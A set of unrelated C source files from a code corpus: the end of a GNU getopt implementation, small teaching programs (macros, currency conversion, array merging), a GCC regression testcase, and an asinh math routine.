to be given in any order, even with programs that were not written to expect this. RETURN_IN_ORDER is an option available to programs that were written to expect options and other ARGV-elements in any order and that care about the ordering of the two. We describe each non-option ARGV-element as if it were the argument of an option with character code 1. Using `-' as the first character of the list of option characters selects this mode of operation. The special argument `--' forces an end of option-scanning regardless of the value of `ordering'. In the case of RETURN_IN_ORDER, only `--' can cause `getopt' to return -1 with `optind' != ARGC. */ static enum { REQUIRE_ORDER, PERMUTE, RETURN_IN_ORDER } ordering; /* Value of POSIXLY_CORRECT environment variable. */ static char *posixly_correct; #ifdef __GNU_LIBRARY__ /* We want to avoid inclusion of string.h with non-GNU libraries because there are many ways it can cause trouble. On some systems, it contains special magic macros that don't work in GCC. */ # include <string.h> # define my_index strchr #else # if HAVE_STRING_H # include <string.h> # else # include <strings.h> # endif /* Avoid depending on library functions or files whose names are inconsistent. */ #ifndef getenv extern char *getenv (); #endif static char * my_index (str, chr) const char *str; int chr; { while (*str) { if (*str == chr) return (char *) str; str++; } return 0; } /* If using GCC, we can safely declare strlen this way. If not using GCC, it is ok not to declare it. */ #ifdef __GNUC__ /* Note that Motorola Delta 68k R3V7 comes with GCC but not stddef.h. That was relevant to code that was here before. */ # if (!defined __STDC__ || !__STDC__) && !defined strlen /* gcc with -traditional declares the built-in strlen to return int, and has done so at least since version 2.4.5. -- rms. */ extern int strlen (const char *); # endif /* not __STDC__ */ #endif /* __GNUC__ */ #endif /* not __GNU_LIBRARY__ */ /* Handle permutation of arguments. */ /* Describe the part of ARGV that contains non-options that have been skipped. `first_nonopt' is the index in ARGV of the first of them; `last_nonopt' is the index after the last of them. */ static int first_nonopt; static int last_nonopt; #ifdef _LIBC /* Bash 2.0 gives us an environment variable containing flags indicating ARGV elements that should not be considered arguments. */ /* Defined in getopt_init.c */ extern char *__getopt_nonoption_flags; static int nonoption_flags_max_len; static int nonoption_flags_len; static int original_argc; static char *const *original_argv; /* Make sure the environment variable bash 2.0 puts in the environment is valid for the getopt call we must make sure that the ARGV passed to getopt is that one passed to the process. */ static void __attribute__ ((unused)) store_args_and_env (int argc, char *const *argv) { /* XXX This is no good solution. We should rather copy the args so that we can compare them later. But we must not use malloc(3). */ original_argc = argc; original_argv = argv; } # ifdef text_set_element text_set_element (__libc_subinit, store_args_and_env); # endif /* text_set_element */ # define SWAP_FLAGS(ch1, ch2) \ if (nonoption_flags_len > 0) \ { \ char __tmp = __getopt_nonoption_flags[ch1]; \ __getopt_nonoption_flags[ch1] = __getopt_nonoption_flags[ch2]; \ __getopt_nonoption_flags[ch2] = __tmp; \ } #else /* !_LIBC */ # define SWAP_FLAGS(ch1, ch2) #endif /* _LIBC */ /* Exchange two adjacent subsequences of ARGV. One subsequence is elements [first_nonopt,last_nonopt) which contains all the non-options that have been skipped so far. The other is elements [last_nonopt,optind), which contains all the options processed since those non-options were skipped. `first_nonopt' and `last_nonopt' are relocated so that they describe the new indices of the non-options in ARGV after they are moved. */ #if defined __STDC__ && __STDC__ static void exchange (char **); #endif static void exchange (argv) char **argv; { int bottom = first_nonopt; int middle = last_nonopt; int top = optind; char *tem; /* Exchange the shorter segment with the far end of the longer segment. That puts the shorter segment into the right place. It leaves the longer segment in the right place overall, but it consists of two parts that need to be swapped next. */ #ifdef _LIBC /* First make sure the handling of the `__getopt_nonoption_flags' string can work normally. Our top argument must be in the range of the string. */ if (nonoption_flags_len > 0 && top >= nonoption_flags_max_len) { /* We must extend the array. The user plays games with us and presents new arguments. */ char *new_str = malloc (top + 1); if (new_str == NULL) nonoption_flags_len = nonoption_flags_max_len = 0; else { memset (__mempcpy (new_str, __getopt_nonoption_flags, nonoption_flags_max_len), '\0', top + 1 - nonoption_flags_max_len); nonoption_flags_max_len = top + 1; __getopt_nonoption_flags = new_str; } } #endif while (top > middle && middle > bottom) { if (top - middle > middle - bottom) { /* Bottom segment is the short one. */ int len = middle - bottom; register int i; /* Swap it with the top part of the top segment. */ for (i = 0; i < len; i++) { tem = argv[bottom + i]; argv[bottom + i] = argv[top - (middle - bottom) + i]; argv[top - (middle - bottom) + i] = tem; SWAP_FLAGS (bottom + i, top - (middle - bottom) + i); } /* Exclude the moved bottom segment from further swapping. */ top -= len; } else { /* Top segment is the short one. */ int len = top - middle; register int i; /* Swap it with the bottom part of the bottom segment. */ for (i = 0; i < len; i++) { tem = argv[bottom + i]; argv[bottom + i] = argv[middle + i]; argv[middle + i] = tem; SWAP_FLAGS (bottom + i, middle + i); } /* Exclude the moved top segment from further swapping. */ bottom += len; } } /* Update records for the slots the non-options now occupy. */ first_nonopt += (optind - last_nonopt); last_nonopt = optind; } /* Initialize the internal data when the first call is made. */ #if defined __STDC__ && __STDC__ static const char *_getopt_initialize (int, char *const *, const char *); #endif static const char * _getopt_initialize (argc, argv, optstring) int argc; char *const *argv; const char *optstring; { /* Start processing options with ARGV-element 1 (since ARGV-element 0 is the program name); the sequence of previously skipped non-option ARGV-elements is empty. */ first_nonopt = last_nonopt = optind; nextchar = NULL; posixly_correct = getenv ("POSIXLY_CORRECT"); /* Determine how to handle the ordering of options and nonoptions. */ if (optstring[0] == '-') { ordering = RETURN_IN_ORDER; ++optstring; } else if (optstring[0] == '+') { ordering = REQUIRE_ORDER; ++optstring; } else if (posixly_correct != NULL) ordering = REQUIRE_ORDER; else ordering = PERMUTE; #ifdef _LIBC if (posixly_correct == NULL && argc == original_argc && argv == original_argv) { if (nonoption_flags_max_len == 0) { if (__getopt_nonoption_flags == NULL || __getopt_nonoption_flags[0] == '\0') nonoption_flags_max_len = -1; else { const char *orig_str = __getopt_nonoption_flags; int len = nonoption_flags_max_len = strlen (orig_str); if (nonoption_flags_max_len < argc) nonoption_flags_max_len = argc; __getopt_nonoption_flags = (char *) malloc (nonoption_flags_max_len); if (__getopt_nonoption_flags == NULL) nonoption_flags_max_len = -1; else memset (__mempcpy (__getopt_nonoption_flags, orig_str, len), '\0', nonoption_flags_max_len - len); } } nonoption_flags_len = nonoption_flags_max_len; } else nonoption_flags_len = 0; #endif return optstring; } /* Scan elements of ARGV (whose length is ARGC) for option characters given in OPTSTRING. If an element of ARGV starts with '-', and is not exactly "-" or "--", then it is an option element. The characters of this element (aside from the initial '-') are option characters. If `getopt' is called repeatedly, it returns successively each of the option characters from each of the option elements. If `getopt' finds another option character, it returns that character, updating `optind' and `nextchar' so that the next call to `getopt' can resume the scan with the following option character or ARGV-element. If there are no more option characters, `getopt' returns -1. Then `optind' is the index in ARGV of the first ARGV-element that is not an option. (The ARGV-elements have been permuted so that those that are not options now come last.) OPTSTRING is a string containing the legitimate option characters. If an option character is seen that is not listed in OPTSTRING, return '?' after printing an error message. If you set `opterr' to zero, the error message is suppressed but we still return '?'. If a char in OPTSTRING is followed by a colon, that means it wants an arg, so the following text in the same ARGV-element, or the text of the following ARGV-element, is returned in `optarg'. Two colons mean an option that wants an optional arg; if there is text in the current ARGV-element, it is returned in `optarg', otherwise `optarg' is set to zero. If OPTSTRING starts with `-' or `+', it requests different methods of handling the non-option ARGV-elements. See the comments about RETURN_IN_ORDER and REQUIRE_ORDER, above. Long-named options begin with `--' instead of `-'. Their names may be abbreviated as long as the abbreviation is unique or is an exact match for some defined option. If they have an argument, it follows the option name in the same ARGV-element, separated from the option name by a `=', or else the in next ARGV-element. When `getopt' finds a long-named option, it returns 0 if that option's `flag' field is nonzero, the value of the option's `val' field if the `flag' field is zero. The elements of ARGV aren't really const, because we permute them. But we pretend they're const in the prototype to be compatible with other systems. LONGOPTS is a vector of `struct option' terminated by an element containing a name which is zero. LONGIND returns the index in LONGOPT of the long-named option found. It is only valid when a long-named option has been found by the most recent call. If LONG_ONLY is nonzero, '-' as well as '--' can introduce long-named options. */ int _getopt_internal (argc, argv, optstring, longopts, longind, long_only) int argc; char *const *argv; const char *optstring; const struct option *longopts; int *longind; int long_only; { int print_errors = opterr; if (optstring[0] == ':') print_errors = 0; if (argc < 1) return -1; optarg = NULL; if (optind == 0 || !__getopt_initialized) { if (optind == 0) optind = 1; /* Don't scan ARGV[0], the program name. */ optstring = _getopt_initialize (argc, argv, optstring); __getopt_initialized = 1; } /* Test whether ARGV[optind] points to a non-option argument. Either it does not have option syntax, or there is an environment flag from the shell indicating it is not an option. The later information is only used when the used in the GNU libc. */ #ifdef _LIBC # define NONOPTION_P (argv[optind][0] != '-' || argv[optind][1] == '\0' \ || (optind < nonoption_flags_len \ && __getopt_nonoption_flags[optind] == '1')) #else # define NONOPTION_P (argv[optind][0] != '-' || argv[optind][1] == '\0') #endif if (nextchar == NULL || *nextchar == '\0') { /* Advance to the next ARGV-element. */ /* Give FIRST_NONOPT & LAST_NONOPT rational values if OPTIND has been moved back by the user (who may also have changed the arguments). */ if (last_nonopt > optind) last_nonopt = optind; if (first_nonopt > optind) first_nonopt = optind; if (ordering == PERMUTE) { /* If we have just processed some options following some non-options, exchange them so that the options come first. */ if (first_nonopt != last_nonopt && last_nonopt != optind) exchange ((char **) argv); else if (last_nonopt != optind) first_nonopt = optind; /* Skip any additional non-options and extend the range of non-options previously skipped. */ while (optind < argc && NONOPTION_P) optind++; last_nonopt = optind; } /* The special ARGV-element `--' means premature end of options. Skip it like a null option, then exchange with previous non-options as if it were an option, then skip everything else like a non-option. */ if (optind != argc && !strcmp (argv[optind], "--")) { optind++; if (first_nonopt != last_nonopt && last_nonopt != optind) exchange ((char **) argv); else if (first_nonopt == last_nonopt) first_nonopt = optind; last_nonopt = argc; optind = argc; } /* If we have done all the ARGV-elements, stop the scan and back over any non-options that we skipped and permuted. */ if (optind == argc) { /* Set the next-arg-index to point at the non-options that we previously skipped, so the caller will digest them. */ if (first_nonopt != last_nonopt) optind = first_nonopt; return -1; } /* If we have come to a non-option and did not permute it, either stop the scan or describe it to the caller and pass it by. */ if (NONOPTION_P) { if (ordering == REQUIRE_ORDER) return -1; optarg = argv[optind++]; return 1; } /* We have found another option-ARGV-element. Skip the initial punctuation. */ nextchar = (argv[optind] + 1 + (longopts != NULL && argv[optind][1] == '-')); } /* Decode the current option-ARGV-element. */ /* Check whether the ARGV-element is a long option. If long_only and the ARGV-element has the form "-f", where f is a valid short option, don't consider it an abbreviated form of a long option that starts with f. Otherwise there would be no way to give the -f short option. On the other hand, if there's a long option "fubar" and the ARGV-element is "-fu", do consider that an abbreviation of the long option, just like "--fu", and not "-f" with arg "u". This distinction seems to be the most useful approach. */ if (longopts != NULL && (argv[optind][1] == '-' || (long_only && (argv[optind][2] || !my_index (optstring, argv[optind][1]))))) { char *nameend; const struct option *p; const struct option *pfound = NULL; int exact = 0; int ambig = 0; int indfound = -1; int option_index; for (nameend = nextchar; *nameend && *nameend != '='; nameend++) /* Do nothing. */ ; /* Test all long options for either exact match or abbreviated matches. */ for (p = longopts, option_index = 0; p->name; p++, option_index++) if (!strncmp (p->name, nextchar, nameend - nextchar)) { if ((unsigned int) (nameend - nextchar) == (unsigned int) strlen (p->name)) { /* Exact match found. */ pfound = p; indfound = option_index; exact = 1; break; } else if (pfound == NULL) { /* First nonexact match found. */ pfound = p; indfound = option_index; } else if (long_only || pfound->has_arg != p->has_arg || pfound->flag != p->flag || pfound->val != p->val) /* Second or later nonexact match found. */ ambig = 1; } if (ambig && !exact) { if (print_errors) fprintf (stderr, _("%s: option `%s' is ambiguous\n"), argv[0], argv[optind]); nextchar += strlen (nextchar); optind++; optopt = 0; return '?'; } if (pfound != NULL) { option_index = indfound; optind++; if (*nameend) { /* Don't test has_arg with >, because some C compilers don't allow it to be used on enums. */ if (pfound->has_arg) optarg = nameend + 1; else { if (print_errors) { if (argv[optind - 1][1] == '-') /* --option */ fprintf (stderr, _("%s: option `--%s' doesn't allow an argument\n"), argv[0], pfound->name); else /* +option or -option */ fprintf (stderr, _("%s: option `%c%s' doesn't allow an argument\n"), argv[0], argv[optind - 1][0], pfound->name); } nextchar += strlen (nextchar); optopt = pfound->val; return '?'; } } else if (pfound->has_arg == 1) { if (optind < argc) optarg = argv[optind++]; else { if (print_errors) fprintf (stderr, _("%s: option `%s' requires an argument\n"), argv[0], argv[optind - 1]); nextchar += strlen (nextchar); optopt = pfound->val; return optstring[0] == ':' ? ':' : '?'; } } nextchar += strlen (nextchar); if (longind != NULL) *longind = option_index; if (pfound->flag) { *(pfound->flag) = pfound->val; return 0; } return pfound->val; } /* Can't find it as a long option. If this is not getopt_long_only, or the option starts with '--' or is not a valid short option, then it's an error. Otherwise interpret it as a short option. */ if (!long_only || argv[optind][1] == '-' || my_index (optstring, *nextchar) == NULL) { if (print_errors) { if (argv[optind][1] == '-') /* --option */ fprintf (stderr, _("%s: unrecognized option `--%s'\n"), argv[0], nextchar); else /* +option or -option */ fprintf (stderr, _("%s: unrecognized option `%c%s'\n"), argv[0], argv[optind][0], nextchar); } nextchar = (char *) ""; optind++; optopt = 0; return '?'; } } /* Look at and handle the next short option-character. */ { char c = *nextchar++; char *temp = my_index (optstring, c); /* Increment `optind' when we start to process its last character. */ if (*nextchar == '\0') ++optind; if (temp == NULL || c == ':') { if (print_errors) { if (posixly_correct) /* 1003.2 specifies the format of this message. */ fprintf (stderr, _("%s: illegal option -- %c\n"), argv[0], c); else fprintf (stderr, _("%s: invalid option -- %c\n"), argv[0], c); } optopt = c; return '?'; } /* Convenience. Treat POSIX -W foo same as long option --foo */ if (temp[0] == 'W' && temp[1] == ';') { char *nameend; const struct option *p; const struct option *pfound = NULL; int exact = 0; int ambig = 0; int indfound = 0; int option_index; /* This is an option that requires an argument. */ if (*nextchar != '\0') { optarg = nextchar; /* If we end this ARGV-element by taking the rest as an arg, we must advance to the next element now. */ optind++; } else if (optind == argc) { if (print_errors) { /* 1003.2 specifies the format of this message. */ fprintf (stderr, _("%s: option requires an argument -- %c\n"), argv[0], c); } optopt = c; if (optstring[0] == ':') c = ':'; else c = '?'; return c; } else /* We already incremented `optind' once; increment it again when taking next ARGV-elt as argument. */ optarg = argv[optind++]; /* optarg is now the argument, see if it's in the table of longopts. */ for (nextchar = nameend = optarg; *nameend && *nameend != '='; nameend++) /* Do nothing. */ ; /* Test all long options for either exact match or abbreviated matches. */ for (p = longopts, option_index = 0; p->name; p++, option_index++) if (!strncmp (p->name, nextchar, nameend - nextchar)) { if ((unsigned int) (nameend - nextchar) == strlen (p->name)) { /* Exact match found. */ pfound = p; indfound = option_index; exact = 1; break; } else if (pfound == NULL) { /* First nonexact match found. */ pfound = p; indfound = option_index; } else /* Second or later nonexact match found. */ ambig = 1; } if (ambig && !exact) { if (print_errors) fprintf (stderr, _("%s: option `-W %s' is ambiguous\n"), argv[0], argv[optind]); nextchar += strlen (nextchar); optind++; return '?'; } if (pfound != NULL) { option_index = indfound; if (*nameend) { /* Don't test has_arg with >, because some C compilers don't allow it to be used on enums. */ if (pfound->has_arg) optarg = nameend + 1; else { if (print_errors) fprintf (stderr, _("\ %s: option `-W %s' doesn't allow an argument\n"), argv[0], pfound->name); nextchar += strlen (nextchar); return '?'; } } else if (pfound->has_arg == 1) { if (optind < argc) optarg = argv[optind++]; else { if (print_errors) fprintf (stderr, _("%s: option `%s' requires an argument\n"), argv[0], argv[optind - 1]); nextchar += strlen (nextchar); return optstring[0] == ':' ? ':' : '?'; } } nextchar += strlen (nextchar); if (longind != NULL) *longind = option_index; if (pfound->flag) { *(pfound->flag) = pfound->val; return 0; } return pfound->val; } nextchar = NULL; return 'W'; /* Let the application handle it. */ } if (temp[1] == ':') { if (temp[2] == ':') { /* This is an option that accepts an argument optionally. */ if (*nextchar != '\0') { optarg = nextchar; optind++; } else optarg = NULL; nextchar = NULL; } else { /* This is an option that requires an argument. */ if (*nextchar != '\0') { optarg = nextchar; /* If we end this ARGV-element by taking the rest as an arg, we must advance to the next element now. */ optind++; } else if (optind == argc) { if (print_errors) { /* 1003.2 specifies the format of this message. */ fprintf (stderr, _("%s: option requires an argument -- %c\n"), argv[0], c); } optopt = c; if (optstring[0] == ':') c = ':'; else c = '?'; } else /* We already incremented `optind' once; increment it again when taking next ARGV-elt as argument. */ optarg = argv[optind++]; nextchar = NULL; } } return c; } } int getopt (argc, argv, optstring) int argc; char *const *argv; const char *optstring; { return _getopt_internal (argc, argv, optstring, (const struct option *) 0, (int *) 0, 0); } int getopt_long (argc, argv, options, long_options, opt_index) int argc; char *const *argv; const char *options; const struct option *long_options; int *opt_index; { return _getopt_internal (argc, argv, options, long_options, opt_index, 0); } /* Like getopt_long, but '-' as well as '--' can indicate a long option. If an option that starts with '-' (not '--') doesn't match a long option, but does match a short option, it is parsed as a short option instead. */ int getopt_long_only (argc, argv, options, long_options, opt_index) int argc; char *const *argv; const char *options; const struct option *long_options; int *opt_index; { return _getopt_internal (argc, argv, options, long_options, opt_index, 1); } #endif /* Not ELIDE_CODE. */
the_stack_data/154827659.c
#include<stdio.h> #include<string.h> #define LONG_MACRO "this is very\ long macro" #define N 100 #define MUL_BY_TWO(a) ((a)+(a)) #define square1(a) ((a)*(a)) #define square2(a) a*a #define min(a,b) ((a)<(b) ? (a):(b)) #define TEST 20 int main () { int j= 2*square1(3+4); printf("j: %d\n",j); j=2*square2(3+4); printf("j: %d\n",j); j=min(3,5); printf("j: %d\n",j); int x=1; int y=5; j=min(++x,y); // ((++x) < (y) ? (++x) : (y)) printf("j: %d\n",j); // j=3 #ifndef False #define False 0 #elif False #undef False #define False 0 #endif int k=False; printf("False: %d",k); //0 #if x==1 #undef x #define x 0 #elif x==2 #undef x #define x 3 #else #define x 4 #endif return 0; }
the_stack_data/236293.c
#include <stdio.h> const double usd_kurs = 1.13681; double artikelpreis; double ergebnis; double eur_usd(double preis) { return preis*usd_kurs; } int main(void) { printf("Gib einen Preis in EUR an, der in USD umgerechnet werden soll:\n> "); scanf("%lf", &artikelpreis); printf("%lf\n", eur_usd(artikelpreis)); return 0; }
the_stack_data/8344.c
/****************************************************************************** Welcome to GDB Online. GDB online is an online compiler and debugger tool for C, C++, Python, PHP, Ruby, C#, VB, Perl, Swift, Prolog, Javascript, Pascal, HTML, CSS, JS Code, Compile, Run and Debug online from anywhere in world. *******************************************************************************/ #include <stdio.h> int main() { int a[10], b[10], c[10], i, j,k; printf("Enter 5 elements in array 1: \n"); for(i=0; i<5; i++){ printf("Store element in a[%d]: ", i); scanf("%d", &a[i]); } printf("Enter 5 elements in array 2: \n"); for(j=0; j<5; j++){ printf("Store element in b[%d]: ", j); scanf("%d", &b[j]); } int m=0,n=0,p=0; while(m<5 && n<5){ if(a[m]<b[n]) { c[p]=a[m]; p++; m++; }else{ c[p]=b[n]; p++; n++; } } while(m<5){ c[p]=a[m]; m++; p++; } while(n<5){ c[p]=b[n]; n++; p++; } for(k=0; k<10; k++){ printf("%d ", c[k]); } return 0; }
the_stack_data/62637538.c
/* This testcase would cause a hang in PTA solving due to a complex copy constraint and marking the wrong variable as changed. */ typedef struct RExC_state_t { char *end; char *parse; } RExC_state_t; struct regnode_string { unsigned char str_len; char string[1]; }; static void *regatom (RExC_state_t * pRExC_state, int *flagp); static void * regpiece (RExC_state_t * pRExC_state, int *flagp) { return regatom (0, 0); } static void * regbranch (RExC_state_t * pRExC_state, int *flagp, int first) { return regpiece (0, 0); } static void * reg (RExC_state_t * pRExC_state, int paren, int *flagp) { return regbranch (0, 0, 1); } void * Perl_pregcomp (char *exp, char *xend, void *pm) { return reg (0, 0, 0); } static void * regatom (RExC_state_t * pRExC_state, int *flagp) { register void *ret = 0; int flags; tryagain: switch (*(pRExC_state->parse)) { case '(': ret = reg (pRExC_state, 1, &flags); if (flags & 0x8) { goto tryagain; } break; default: { register unsigned long len; register unsigned ender; register char *p; char *oldp, *s; unsigned long numlen; unsigned long foldlen; unsigned char tmpbuf[6 + 1], *foldbuf; defchar: s = (((struct regnode_string *) ret)->string); for (len = 0, p = (pRExC_state->parse) - 1; len < 127 && p < (pRExC_state->end); len++) { if (((*p) == '*' || (*p) == '+' || (*p) == '?' || ((*p) == '{' && regcurly (p)))) { unsigned long unilen; for (foldbuf = tmpbuf; foldlen; foldlen -= numlen) { reguni (pRExC_state, ender, s, &unilen); s += unilen; } break; } unsigned long unilen; reguni (pRExC_state, ender, s, &unilen); s += unilen; } }; break; } return (ret); }
the_stack_data/77505.c
/* * POK header * * The following file is a part of the POK project. Any modification should * made according to the POK licence. You CANNOT use this file or a part of * this file is this part of a file for your own project * * For more information on the POK licence, please see our LICENCE FILE * * Please follow the coding guidelines described in doc/CODING_GUIDELINES * * Copyright (c) 2007-2009 POK team * * Created by julien on Fri Jan 30 14:41:34 2009 */ /* @(#)s_asinh.c 5.1 93/09/24 */ /* * ==================================================== * Copyright (C) 1993 by Sun Microsystems, Inc. All rights reserved. * * Developed at SunPro, a Sun Microsystems, Inc. business. * Permission to use, copy, modify, and distribute this * software is freely granted, provided that this notice * is preserved. * ==================================================== */ /* asinh(x) * Method : * Based on * asinh(x) = sign(x) * log [ |x| + sqrt(x*x+1) ] * we have * asinh(x) := x if 1+x*x=1, * := sign(x)*(log(x)+ln2)) for large |x|, else * := sign(x)*log(2|x|+1/(|x|+sqrt(x*x+1))) if|x|>2, else * := sign(x)*log1p(|x| + x^2/(1 + sqrt(1+x^2))) */ #ifdef POK_NEEDS_LIBMATH #include <types.h> #include <libm.h> #include "math_private.h" static const double one = 1.00000000000000000000e+00, /* 0x3FF00000, 0x00000000 */ ln2 = 6.93147180559945286227e-01, /* 0x3FE62E42, 0xFEFA39EF */ huge = 1.00000000000000000000e+300; double asinh(double x) { double t, w; int32_t hx, ix; GET_HIGH_WORD(hx, x); ix = hx & 0x7fffffff; if (ix >= 0x7ff00000) return x + x; /* x is inf or NaN */ if (ix < 0x3e300000) { /* |x|<2**-28 */ if (huge + x > one) return x; /* return x inexact except 0 */ } if (ix > 0x41b00000) { /* |x| > 2**28 */ w = __ieee754_log(fabs(x)) + ln2; } else if (ix > 0x40000000) { /* 2**28 > |x| > 2.0 */ t = fabs(x); w = __ieee754_log(2.0 * t + one / (__ieee754_sqrt(x * x + one) + t)); } else { /* 2.0 > |x| > 2**-28 */ t = x * x; w = log1p(fabs(x) + t / (one + __ieee754_sqrt(one + t))); } if (hx > 0) return w; else return -w; } #endif